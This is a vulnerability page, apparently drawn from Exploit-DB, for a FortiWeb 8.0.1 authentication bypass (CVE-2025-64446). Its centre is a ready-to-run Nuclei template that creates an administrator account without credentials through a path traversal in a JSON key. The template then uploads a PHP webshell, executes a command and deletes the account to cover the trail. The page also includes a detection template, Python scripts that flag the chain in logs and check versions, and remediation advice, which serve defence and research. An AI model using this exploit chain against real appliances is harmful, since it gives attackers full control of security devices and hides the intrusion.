[webapps] Fortinet FortiWeb v8.0.1 - Auth Bypass
CVE-2025-64446
Fortinet FortiWeb 8.0.1 contains an authentication bypass: an unauthenticated attacker can reach the management interface and obtain administrative access to the appliance.
Critical · CVSS 9.8
📋 Basic Vulnerability Information
| CVE | CVE-2025-64446 |
|---|---|
| Vulnerability type | Authentication bypass |
| Affected version | Fortinet FortiWeb v8.0.1 |
| Severity | Critical · CVSS 9.8 |
| Published | 2026-04-06 |
| Submitted by | nu11secur1ty |
| Source | Exploit-DB (original advisory) |
🔬 Root Cause
Missing authentication on a critical function (CWE-306) reached through relative path traversal: the user-management API accepts a JSON object key such as `../../mkey` and uses it to address the account record, so a request that never presented credentials can create a local administrator account. That single request, not a password check that is skipped, is what the exploit template on this page relies on; everything after it is ordinary authenticated use of the new account.
🎯 Attack Scenario
1. The attacker locates the FortiWeb management interface (for example the /login page).
2. Without any credentials, the attacker sends a crafted JSON POST to the user-management API (/api/v2.0/user/local.add in the template below) whose key `../../mkey` traverses out of the intended object and creates a local account flagged `isadmin`.
3. The attacker logs in with the new account through the normal /api/v2.0/login endpoint and receives a valid management session cookie.
4. With that session the attacker holds administrator rights and can upload arbitrary files (the template drops a webshell through the configuration-backup endpoint), take full control of the device, and finally delete the temporary account to cover the trail.
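The chain above leaves a defender three concrete signals to hunt for. The following Python script is an added example (it is not part of the original post, nor Fortinet's or the template author's code) that runs three heuristics derived from the template over a handful of constructed request records: a `..` path component inside a JSON key, a POST to the user-management API with no session cookie, and a GET for a filename that the same client previously uploaded through the backup endpoint. The `Request` record layout, the source addresses, the `sid` cookie name and the assumption that an authenticated management session is visible as a `Cookie` header are all constructed for the example.

```python
import json
import re
from dataclasses import dataclass, field
from typing import Dict, List, Set

# Endpoints taken from the exploit template on this page.
ADMIN_USER_API = {"/api/v2.0/user/local.add", "/api/v2.0/user/local.delete"}
BACKUP_UPLOAD_API = "/api/v2.0/system/maintenance/backup"
# A ".." path component inside a JSON *key*, e.g. "../../mkey".
TRAVERSAL_IN_KEY = re.compile(r"(^|/)\.\.(/|$)")
MULTIPART_FILENAME = re.compile(r'filename="([^"]+)"')


@dataclass
class Request:
    """One request as a proxy or WAF log might record it (constructed layout)."""
    src: str
    method: str
    path: str
    headers: Dict[str, str] = field(default_factory=dict)
    body: str = ""


def json_keys(body: str) -> List[str]:
    """All object keys at any depth of a JSON body; [] when the body is not JSON."""
    try:
        doc = json.loads(body)
    except ValueError:
        return []
    keys: List[str] = []

    def walk(node) -> None:
        if isinstance(node, dict):
            for key, value in node.items():
                keys.append(key)
                walk(value)
        elif isinstance(node, list):
            for value in node:
                walk(value)

    walk(doc)
    return keys


def analyze(requests: List[Request]) -> List[dict]:
    """Return one finding per suspicious event, in request order."""
    findings: List[dict] = []
    uploaded: Dict[str, Set[str]] = {}  # src -> filenames sent to the backup endpoint
    for r in requests:
        # Assumption: a live management session shows up as a Cookie header.
        authenticated = any(h.lower() == "cookie" for h in r.headers)
        for key in json_keys(r.body):
            if TRAVERSAL_IN_KEY.search(key):
                findings.append({"kind": "traversal-in-json-key", "src": r.src,
                                 "path": r.path, "key": key})
        if r.method == "POST" and r.path in ADMIN_USER_API and not authenticated:
            findings.append({"kind": "unauthenticated-admin-api", "src": r.src, "path": r.path})
        if r.method == "POST" and r.path == BACKUP_UPLOAD_API:
            for name in MULTIPART_FILENAME.findall(r.body):
                uploaded.setdefault(r.src, set()).add("/" + name.lstrip("/"))
        if r.method == "GET" and r.path in uploaded.get(r.src, set()):
            findings.append({"kind": "uploaded-file-fetched", "src": r.src, "path": r.path})
    return findings


# Constructed sample: five requests mirroring the template chain, plus one benign request.
ATTACKER = "198.51.100.7"
JSON_HDR = {"Content-Type": "application/json"}
SESSION = {"Cookie": "sid=0123abcd"}  # constructed session cookie name
SAMPLE = [
    Request(ATTACKER, "POST", "/api/v2.0/user/local.add", JSON_HDR,
            '{"../../mkey": "pwnedadmin", "password": "Pwned123!", "isadmin": "1", "status": "enable"}'),
    Request(ATTACKER, "POST", "/api/v2.0/login", JSON_HDR,
            '{"username": "pwnedadmin", "password": "Pwned123!"}'),
    Request(ATTACKER, "POST", BACKUP_UPLOAD_API,
            {**SESSION, "Content-Type": "multipart/form-data; boundary=xyz"},
            '--xyz\r\nContent-Disposition: form-data; name="upload-file"; filename="pwned.dat"\r\n'
            '\r\nBASE64_PAYLOAD\r\n--xyz--'),
    Request(ATTACKER, "GET", "/pwned.dat", dict(SESSION)),
    Request(ATTACKER, "POST", "/api/v2.0/user/local.delete", {**SESSION, **JSON_HDR},
            '{"../../mkey": "pwnedadmin"}'),
    # A legitimate, authenticated admin creation with a plain key must not fire.
    Request("10.0.0.5", "POST", "/api/v2.0/user/local.add", {**SESSION, **JSON_HDR},
            '{"mkey": "ops-admin", "password": "S3cret!", "isadmin": "1"}'),
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE):
        print(finding)
```

Run over the sample the script reports four events, all from the attacker address: the traversal key and the missing session on the account-creation request, the fetch of `pwned.dat` after its upload, and the traversal key again on the cleanup request (which is authenticated, so the second heuristic stays quiet). The benign request produces nothing. The upload-then-fetch correlation is keyed per source address, so it needs request logs that keep the client address; the JSON-key check works on a single request and is the cheapest to turn into a WAF or proxy rule.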
💥 Impact
The attacker obtains full administrative control of the appliance and can rewrite protection policies and firewall rules, intercept the traffic the device protects, plant malicious configuration, or take the device out of service.
⚔️ Nuclei Exploit Template
The following template, in standard Nuclei v3 format, can be used to verify the vulnerability. It is not a passive check: it creates an administrator account, writes a file to the appliance and executes a command, so run it only against systems you are authorized to test, and expect traces (a transient `pwnedadmin` user, a `pwned.dat` upload) in the device's audit logs. The final GET also assumes the appliance serves and executes the uploaded file from its web root, which the template does not otherwise establish.
```yaml
id: CVE-2025-64446-exploit

info:
  name: FortiWeb RCE Exploit - CVE-2025-64446
  author: your-nuclei-author
  severity: critical
  description: >-
    Exploits CVE-2025-64446 in FortiWeb to achieve Remote Code Execution (RCE)
    via authentication bypass, path traversal, and arbitrary file upload.
    The chain creates a temporary admin user, logs in, uploads a webshell,
    executes a specified command, and finally deletes the temporary user.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-64446
    - https://www.fortinet.com/support/psirt/FG-IR-25-64444
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2025-64446
    cwe-id: CWE-306

variables:
  username: "pwnedadmin"
  password: "Pwned123!"
  cmd: "id"

http:
  - raw:
      # Step 1: unauthenticated admin creation; the traversal is in the JSON key.
      - |+
        POST /api/v2.0/user/local.add HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"../../mkey": "{{username}}", "password": "{{password}}", "isadmin": "1", "status": "enable"}

      # Step 2: log in as the new admin; cookie-reuse carries the session onward.
      - |+
        POST /api/v2.0/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username": "{{username}}", "password": "{{password}}"}

      # Step 3: upload the webshell through the configuration-backup endpoint.
      - |+
        POST /api/v2.0/system/maintenance/backup HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxyz

        ------WebKitFormBoundaryxyz
        Content-Disposition: form-data; name="upload-file"; filename="pwned.dat"
        Content-Type: application/octet-stream

        {{base64('<?php system("' + cmd + '"); ?>')}}
        ------WebKitFormBoundaryxyz--

      # Step 4: request the uploaded file; the matcher looks for command output.
      - |+
        GET /pwned.dat HTTP/1.1
        Host: {{Hostname}}

      # Step 5: clean up the temporary admin account.
      - |+
        POST /api/v2.0/user/local.delete HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"../../mkey": "{{username}}"}

    cookie-reuse: true

    matchers:
      - type: word
        part: body
        words:
          - "uid="
          - "root:"
        condition: or

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '([^\s]+)'
```
🔍 Nuclei Detection Template
The following detection template fingerprints the management interface and extracts a version string. It does not exercise the vulnerability, so a match only tells you that a FortiWeb interface is exposed; the extracted version still has to be compared with the affected range.
```yaml
id: CVE-2025-64446-detection

info:
  name: FortiWeb Detection - CVE-2025-64446
  author: your-nuclei-author
  severity: critical
  description: >-
    Fingerprints a FortiWeb management interface and extracts the version
    string so it can be compared with the range affected by CVE-2025-64446
    (RCE via authentication bypass, path traversal, and arbitrary file upload).
    A match on the product name alone does not prove the target is vulnerable.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-64446
    - https://www.fortinet.com/support/psirt/FG-IR-25-64444
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2025-64446
    cwe-id: CWE-306

http:
  - method: GET
    path:
      - "{{BaseURL}}/"
      - "{{BaseURL}}/admin/"
      - "{{BaseURL}}/browse.do"
      - "{{BaseURL}}/login"
    redirects: true
    max-redirects: 2
    stop-at-first-match: true

    matchers:
      - type: word
        part: body
        words:
          - "FortiWeb"
          - "Fortinet"
          - "FortiWeb-"
        condition: or

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - 'FortiWeb(?:-([\d.]+))?'
          - 'v([\d.]+)'
          - 'FortiWeb\s+([\d.]+)'
        internal: false
```
🛡️ Remediation
Upgrade FortiWeb to the latest release (8.0.2 or later); Fortinet has published a security advisory. As interim measures, restrict access to the management interface to trusted IP addresses and enable multi-factor authentication. Note that the exploit chain creates its own administrator account without ever authenticating as an existing user, so MFA on existing accounts does not stop the initial bypass; restricting network reachability of the management interface is the control that actually blocks it. Also review the local administrator list and the audit log for accounts that were created and deleted unexpectedly, since the chain removes its account after use.
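Because the detection template matches on the product name alone, the verdict still depends on comparing the extracted version with the range given on this page. The following Python script is an added example (not part of the original post, nor any Fortinet tooling) that applies the same three regular expressions as the template's extractor in the same order, converts the capture into a numeric tuple, and compares it with 8.0.1 (listed above as affected) and 8.0.2 (the remediation threshold). The HTML snippets it runs on are constructed; versions this page says nothing about are reported as not-listed rather than guessed.

```python
import re
from typing import Optional, Tuple

# The same three patterns the detection template's extractor uses, in the same order.
VERSION_PATTERNS = [
    re.compile(r"FortiWeb(?:-([\d.]+))?"),
    re.compile(r"v([\d.]+)"),
    re.compile(r"FortiWeb\s+([\d.]+)"),
]
FINGERPRINT_WORDS = ("FortiWeb", "Fortinet")  # the template's matcher words
AFFECTED = (8, 0, 1)    # version this page lists as affected
FIXED_FROM = (8, 0, 2)  # remediation threshold given on this page


def extract_version(body: str) -> Optional[Tuple[int, ...]]:
    """First capture that actually contains digits wins, as in the template."""
    for pattern in VERSION_PATTERNS:
        for match in pattern.finditer(body):
            raw = match.group(1)
            if not raw:
                continue  # bare "FortiWeb" without "-x.y.z": group 1 is empty
            parts = [p for p in raw.split(".") if p]
            if parts:
                return tuple(int(p) for p in parts)
    return None


def assess(body: str) -> dict:
    """Fingerprint the page, then turn the version into a verdict.

    Tuples compare numerically, so 8.0.10 sorts after 8.0.2; comparing the
    raw strings would put it before 8.0.2 and misreport it.
    """
    fingerprinted = any(word in body for word in FINGERPRINT_WORDS)
    version = extract_version(body) if fingerprinted else None
    if not fingerprinted:
        verdict = "not-fortiweb"
    elif version is None:
        verdict = "version-unknown"
    elif version >= FIXED_FROM:
        verdict = "patched"
    elif version == AFFECTED:
        verdict = "affected"
    else:
        verdict = "not-listed"  # this page says nothing about other branches
    return {"fingerprinted": fingerprinted, "version": version, "verdict": verdict}


# Constructed response bodies, not captures from real appliances.
SAMPLES = {
    "<title>FortiWeb-8.0.1 Login</title>": "affected",
    "<title>FortiWeb-8.0.2 Login</title>": "patched",
    "Fortinet FortiWeb v8.0.10": "patched",
    "FortiWeb 7.6.0": "not-listed",
    "Welcome to the Fortinet login page": "version-unknown",
    "<html><body>nginx</body></html>": "not-fortiweb",
}


def check_samples() -> bool:
    """True when every constructed sample gets the verdict written beside it."""
    return all(assess(body)["verdict"] == expected for body, expected in SAMPLES.items())


if __name__ == "__main__":
    for body, expected in SAMPLES.items():
        result = assess(body)
        print(f"{result['verdict']:16} (expected {expected:16}) <- {body}")
```

The second pattern, `v([\d.]+)`, is as loose in this script as it is in the template: any lowercase `v` followed by digits anywhere in the body will be taken as a version, so on a real page it is worth confirming the capture sits next to the product name before acting on the verdict.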
⚠️ This page is based on public vulnerability databases and is provided for security research and defensive reference only. Generated: 2026-05-07 07:41 | Source: Exploit-DB